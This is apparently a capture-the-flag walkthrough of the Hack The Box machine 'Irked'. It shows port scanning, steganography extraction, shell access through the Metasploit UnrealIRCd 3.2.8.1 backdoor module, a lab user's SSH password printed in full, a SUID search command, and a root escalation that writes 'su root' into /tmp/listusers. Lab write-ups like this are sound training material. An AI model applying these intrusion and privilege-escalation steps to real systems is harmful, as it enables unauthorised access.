HTB Irked — Walkthrough

So let’s start enumeration with an nmap scan:

root@ArmourInfosec:~/ nmap -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52816/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We found port 80 open, so let’s have a look there.

We got nothing except an image and the line “IRC is almost working”.

That’s a hint that there is something in IRC, but the image also looked suspicious, so I downloaded it and tried various methods. I noticed that when I used steghide with a blank passphrase it showed something strange:

root@ArmourInfosec:~/ steghide extract -sf irked.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

OK, now let’s look at the other part, IRC. I will use HexChat to join the IRC server and see whether it requires authentication. Type hexchat in your terminal, click Add, fill in the IP and port, and click Connect. And yes, it is not authenticated.

A strange thing I noticed here is that the IRC server version is outdated, UnrealIRCd 3.2.8.1, so I searched for it on Google and found a Metasploit module for it. I fired up Metasploit, selected the module exploit/unix/irc/unreal_ircd_3281_backdoor, filled in the required options and ran the exploit.

And we got a shell.

So we go to the /home/djmardov directory, and inside Documents there are two files: user.txt and .backup.

We can’t open user.txt because we don’t have the privileges, so we open .backup:

cat .backup
UPupDOWNdownLRlrBAbaSSss

OK, so using that as the passphrase we can extract pass.txt from irked.jpg.

Let’s try to log in as the user with this password:

djmardov:Kab6h+m+bbp2J:HG

ssh djmardov@10.10.10.117

Now I simply read user.txt and started enumerating for privilege escalation.

OK, so I looked for binaries with the SUID or SGID bit set:

find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

and found the binary /usr/bin/viewuser. When we run it, it executes sh -c /tmp/listusers.

So I manipulated the input: I wrote su root into the listusers file in /tmp and then just ran

echo "su root" > /tmp/listusers && chmod 777 /tmp/listusers && /usr/bin/viewuser

and you will get root.

What really happened???

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Thank you for reading!

Vaibhav Joshi

Security Researcher | OSCP
